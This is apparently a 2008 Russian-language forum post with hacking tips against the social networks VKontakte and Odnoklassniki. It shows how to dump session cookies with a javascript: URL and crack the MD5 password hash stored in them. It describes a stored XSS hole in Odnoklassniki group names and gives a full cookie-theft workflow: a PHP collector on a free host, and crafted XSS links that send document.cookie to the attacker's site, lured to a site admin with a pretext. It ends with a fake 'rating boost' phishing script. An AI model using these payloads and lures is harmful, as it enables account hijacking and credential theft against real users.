Выцепить пароль из кукисов: пользователь входит на страничку под своим аккаунтом, затем в url ввести javascript:document.write(document.cookie) Получаем: remixchk=5; remixmid=1892135; remixemail=<user>%40mail.ru; remixpass=32105a88942c409249c3710882ca57c4; remixlang=0; remixautobookmark=2
расшифровываем remixpass, который является MD5 хэшем и вуа-ля:)
Отправлено: 06.11.08 14:22. Заголовок: Дыра в одноклассника..
Дыра в одноклассниках:
Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... но она легко снимается оперой:)))
Пример названия группы: </title><script>alert('Андрюха мегакрут!!!!!!!!!!!')</script>
Дальше идём на любой халявный хост с поддержкой php (пример, http://holm.ru) Регим там свой акк... заливаем туда это скрипт (css.php) Дальше... узнаём мыло админа... и кидаем ему такую ссылку и пишем типо нашёл опечатку или ещё что-то... короч посмотрите... Ссылка должна быть такая: http://site.com/q=<script>document.location.replace('http://твой_сайт.ru/css.php?'+document.cookie)</script> или ещё вариант http://site.com/q=<script>open('http://твой_сайт.ru/css.php?'+document.cookie)</script> или http://site.com/q=<script>var i=new Image(); i.src='http://твой_сайт.ru/css.php?+dociment.cookie';</script>
где "http://site.com/q=" - это тот параметр, где ты нашёл xss багу...
Вроже бы всё... и потом глядишь и админские кукисы у тебя
код в циферках аналогичен: var ratenum = prompt('На сколько поднять рейтинг ?');alert('Рейтинг успешно поднян на '+ratenum+' единиц - перезайдите пожайлуста для активации .');document.innerHtml='<iframe src="http://vkontakte.ru" width="100%" height="100%" frameborder="0">';
Все даты в формате GMT
3 час. Хитов сегодня: 3
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация вкл, правка нет